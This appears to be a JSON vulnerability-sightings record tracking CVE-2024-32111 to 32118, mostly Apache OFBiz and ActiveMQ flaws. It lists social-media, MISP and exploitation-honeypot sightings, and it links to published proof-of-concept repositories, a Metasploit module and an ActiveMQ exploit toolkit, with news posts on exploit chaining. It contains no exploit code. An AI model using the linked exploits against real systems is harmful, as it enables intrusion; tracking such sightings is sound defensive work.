{"vulnerability": "CVE-2024-3211", "sightings": [{"uuid": "8bed752b-e933-4602-96d0-0a61d9f42e18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32118", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113471621703891497", "content": "", "creation_timestamp": "2024-11-12T19:25:41.077834Z"}, {"uuid": "8b5c7339-1786-4bd0-9b03-225241deb673", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32116", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113471621703891497", "content": "", "creation_timestamp": "2024-11-12T19:25:41.116244Z"}, {"uuid": "643a1d91-1678-4aaf-a3db-dfd795fbafcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32117", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113471621703891497", "content": "", "creation_timestamp": "2024-11-12T19:25:40.876798Z"}, {"uuid": "5dfb02a5-5f17-4184-99b5-16dd2421747f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-08-07T18:10:02.000000Z"}, {"uuid": "11281fe2-55c1-481d-a0de-18fa88a9ee1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32115", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113827237083414757", "content": "", "creation_timestamp": "2025-01-14T14:43:20.699855Z"}, {"uuid": "6544d965-145f-4395-bcef-be871145e62f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32115", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113827355879730690", "content": "", "creation_timestamp": "2025-01-14T15:13:33.761237Z"}, {"uuid": "01501e2e-6e91-4479-9d3f-d05047278588", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32115", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfpguwvydl2s", "content": "", "creation_timestamp": "2025-01-14T14:16:43.154230Z"}, {"uuid": "2a426011-2c74-4fa8-b7c5-0154b2e2cc4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-14)", "content": "", "creation_timestamp": "2025-01-14T00:00:00.000000Z"}, {"uuid": "0d0e0338-6c26-487c-8e16-617840e08b69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:46.000000Z"}, {"uuid": "d9f7cae2-6fb9-4b38-b1b4-95d9d52f76f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:03.000000Z"}, {"uuid": "28a7db97-4206-4703-987b-e42fc168a31c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:11:02.000000Z"}, {"uuid": "e586a800-0471-48a0-9c6c-21c60210e16c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:56.000000Z"}, {"uuid": "3d747b3d-4fab-4974-926b-db76da43fe7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32114", "type": "seen", "source": "https://bsky.app/profile/idolinux.bsky.social/post/3lwtapme4e52q", "content": "", "creation_timestamp": "2025-08-20T10:45:19.128288Z"}, {"uuid": "b15ab169-5454-4542-8f5a-429c8fdac4ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb", "content": "", "creation_timestamp": "2024-06-17T15:39:13.000000Z"}, {"uuid": "815267cf-a1d5-4416-a806-3a84675057d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:13:16.000000Z"}, {"uuid": "5f6a9612-459d-4e4d-bad2-088a2a14ab2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32111", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mgfoq6q5ca24", "content": "", "creation_timestamp": "2026-03-06T16:02:00.193339Z"}, {"uuid": "2cce512b-18d6-4d12-ac8c-c71feb152dcb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:01:38.000000Z"}, {"uuid": "d19d35f1-500c-4655-aae6-f42938fd14cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32114", "type": "seen", "source": "https://bsky.app/profile/derdreschi84.bsky.social/post/3lxriucqyck2h", "content": "", "creation_timestamp": "2025-09-01T11:30:58.328244Z"}, {"uuid": "b6a2c99b-06e9-4699-a278-a4949214c046", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-32118", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/095373a5-9369-47a8-addc-a3cc46dc2b41", "content": "", "creation_timestamp": "2024-11-13T15:13:17.127651Z"}, {"uuid": "e3782f17-45e9-4e8c-a28f-a2e8cbb00bc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-32117", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/095373a5-9369-47a8-addc-a3cc46dc2b41", "content": "", "creation_timestamp": "2024-11-13T15:13:17.127651Z"}, {"uuid": "d2587233-5bc3-4a35-b851-487f9825d975", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-32116", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/095373a5-9369-47a8-addc-a3cc46dc2b41", "content": "", "creation_timestamp": "2024-11-13T15:13:17.127651Z"}, {"uuid": "f02edbee-e0e0-455e-9092-7f5876c31d0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32114", "type": "seen", "source": "https://t.me/GithubRedTeam/81019", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a ActiveMQ-EXPtools\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Catherines77\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Java\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-20 03:28:09\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u652f\u6301\u68c0\u6d4b\u548c\u5229\u7528ActiveMQ\u6f0f\u6d1e\uff0cCVE-2015-5254\uff0cCVE-2016-3088\uff0cCVE-2022-41678\uff0cCVE-2023-46604\uff0cCVE-2024-32114\uff0cCVE-2026-34197\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-20T04:00:04.000000Z"}, {"uuid": "c14f1ee0-1ca0-490b-9d7a-d4bebdf69ce0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2024-32113", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/80dc021f-179d-40d6-aeb8-19482aa8585d", "content": "", "creation_timestamp": "2026-02-02T12:26:32.219555Z"}, {"uuid": "c540c8a2-d2cf-4587-aa41-dd83c3f8c17b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32114", "type": "seen", "source": "https://swecyb.com/ap/users/116080658609901341/statuses/116366248806466359", "content": "", "creation_timestamp": "2026-04-08T01:19:09.013808Z"}, {"uuid": "e79ed430-b716-4a7f-97a8-566fdd391f73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32114", "type": "exploited", "source": "https://t.me/true_secator/8118", "content": "\u041d\u0435\u0434\u0430\u0432\u043d\u044f\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Apache ActiveMQ \u0442\u0435\u043f\u0435\u0440\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2026-34197 \u0438 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e 10 \u0434\u043d\u0435\u0439 \u043d\u0430\u0437\u0430\u0434, \u0441\u043a\u0440\u044b\u0432\u0430\u044f\u0441\u044c \u0432 \u043a\u043e\u0434\u0435 \u041f\u041e \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 13 \u043b\u0435\u0442. \u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 5.19.5 \u0438 6.2.3.\n\nApache ActiveMQ - \u044d\u0442\u043e \u0431\u0440\u043e\u043a\u0435\u0440 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0449\u0438\u0439 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u0432 \u0438 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u044e\u0449\u0438\u0439 \u043d\u0430\u0434\u0435\u0436\u043d\u0443\u044e \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u0443\u044e \u0441\u0432\u044f\u0437\u044c \u043c\u0435\u0436\u0434\u0443 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c\u0438.\u00a0\n\nCVE-2026-34197 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 API Jolokia \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434.\n\nHorizon3, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 7 \u0430\u043f\u0440\u0435\u043b\u044f, \u043e\u0442\u043c\u0435\u0442\u0438\u0432, \u0447\u0442\u043e \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2026-34197 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u043c\u043d\u043e\u0433\u0438\u0435 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b Apache ActiveMQ \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u044b \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c\u0438 \u0443\u0447\u0435\u0442\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, CVE-2026-34197 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0435\u043d\u0430 \u0441 \u0431\u043e\u043b\u0435\u0435 \u0441\u0442\u0430\u0440\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u043e\u0439 \u043a\u0430\u043a CVE-2024-32114, \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0438\u0436\u0435\u043d\u0438\u044f \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430.\n\n\u0412 \u0447\u0435\u0442\u0432\u0435\u0440\u0433 CISA\u00a0\u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0430 CVE-2026-34197\u00a0\u0432 \u0441\u0432\u043e\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433 KEV. \u041e\u0434\u043d\u0430\u043a\u043e \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435, \u043f\u043e \u0432\u0441\u0435\u0439 \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u0435\u0442 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439 \u043e\u0431 \u0430\u0442\u0430\u043a\u0430\u0445, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 \u044d\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c.\n\n\u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u0442\u0435\u043c, \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044e\u044e \u043d\u0435\u0434\u0435\u043b\u044e Fortinet \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0434\u0435\u0441\u044f\u0442\u043a\u0438 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0435\u0451 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.", "creation_timestamp": "2026-04-17T18:30:06.000000Z"}, {"uuid": "9a1b332c-6ff2-4644-874e-20b824f97b99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32114", "type": "seen", "source": "https://bsky.app/profile/infosecbot.bsky.social/post/3mk3r6dppxq2t", "content": "", "creation_timestamp": "2026-04-22T14:59:51.602709Z"}, {"uuid": "5eac3771-3ee8-4780-b1fc-81fe9c7f48bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8190", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32113 Apache OFBIZ Batch Scanning\nURL\uff1ahttps://github.com/YongYe-Security/CVE-2024-32113\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-07T07:14:30.000000Z"}, {"uuid": "1347a4eb-1628-4af8-bc51-4397b588707b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/cve202432113", "content": "", "creation_timestamp": "2025-01-28T23:26:01.000000Z"}, {"uuid": "bc64d1ec-1f46-4487-95c8-e39c67bbe68d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32114", "type": "seen", "source": "https://bsky.app/profile/shortinfo.bsky.social/post/3mjvp4vumq22b", "content": "", "creation_timestamp": "2026-04-20T05:07:18.008929Z"}, {"uuid": "40a1f717-bdb9-4125-8335-8948d8d5942c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9581", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-32113 PoC\nURL\uff1ahttps://github.com/MikeyPPPPPPPP/CVE-2024-32113\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-12-24T09:21:10.000000Z"}, {"uuid": "7ef6b041-1d7d-486c-83e7-53027831676c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32113", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7507", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aApache OFBIZ Path traversal leading to RCE EXP\nURL\uff1ahttps://github.com/Mr-xn/CVE-2024-32113\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-03T16:09:34.000000Z"}, {"uuid": "4d306229-60f2-4402-886e-0dbb31f7c22d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32114", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3mk6vwtruuc2g", "content": "", "creation_timestamp": "2026-04-23T21:03:11.902000Z"}, {"uuid": "baaa2451-7bf6-4aa4-bee7-be3ac80e550e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32114", "type": "seen", "source": "https://t.me/thehackernews/8777", "content": "A 13-year-old flaw in Apache ActiveMQ can lead to RCE.\n\nCVE-2026-34197 lets attackers run OS commands via the Jolokia API. Chained with CVE-2024-32114, it becomes unauthenticated RCE on some versions.\n\nPatched in 5.19.4 and 6.2.3.\n\n\ud83d\udd17 Learn more \u2192 https://thehackernews.com/2026/04/threatsday-bulletin-hybrid-p2p-botnet.html#chained-flaws-enable-stealth-rce", "creation_timestamp": "2026-04-10T09:05:55.000000Z"}, {"uuid": "5f6589e6-520a-4106-a940-eebf57497234", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-32114", "type": "seen", "source": "https://t.me/true_secator/8085", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Apache ActiveMQ Classic, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u0430\u0441\u044c \u043d\u0435\u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u043e\u0439 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 13 \u043b\u0435\u0442 \u0438 \u043c\u043e\u0433\u043b\u0430 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0418\u0418-\u043f\u043e\u043c\u043e\u0449\u043d\u0438\u043a\u0430 Claude, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u043b \u043f\u0443\u0442\u044c \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u043e\u0432.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2026-34197 (CVSS 8,8) \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Apache ActiveMQ/Broker \u0434\u043e 5.19.4, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u043e\u0442 6.0.0 \u0434\u043e 6.2.3.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e ActiveMQ \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u0443\u044e \u0432\u0435\u0442\u043a\u0443 \u00abArtemis\u00bb \u0441 \u0443\u043b\u0443\u0447\u0448\u0435\u043d\u043d\u043e\u0439 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c\u044e, \u0432\u0435\u0440\u0441\u0438\u044f \u00abClassic\u00bb, \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u0430\u044f CVE-2026-34197, \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445, \u0432\u0435\u0431-\u0431\u044d\u043a\u0435\u043d\u0434\u0430\u0445, \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0438 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u043d\u0430 Java.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c Horizon3 \u041d\u0430\u0432\u0438\u043d \u0421\u0443\u043d\u043a\u0430\u0432\u0430\u043b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u00ab\u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0432\u0441\u0435\u0433\u043e \u043b\u0438\u0448\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043f\u0440\u043e\u0441\u0442\u044b\u0445 \u043f\u043e\u0434\u0441\u043a\u0430\u0437\u043e\u043a\u00bb \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Claude. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c 80% \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u043b Claude, \u0430 20% - \u0447\u0435\u043b\u043e\u0432\u0435\u043a.\n\n\u041a\u0430\u043a \u043e\u0442\u043c\u0435\u0442\u0438\u043b \u0421\u0443\u043d\u043a\u0430\u0432\u0430\u043b\u043b\u0438, \u0447\u0442\u043e Claude \u0443\u043a\u0430\u0437\u0430\u043b \u043d\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u043f\u043e\u0441\u043b\u0435 \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u0430 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u043e\u0432 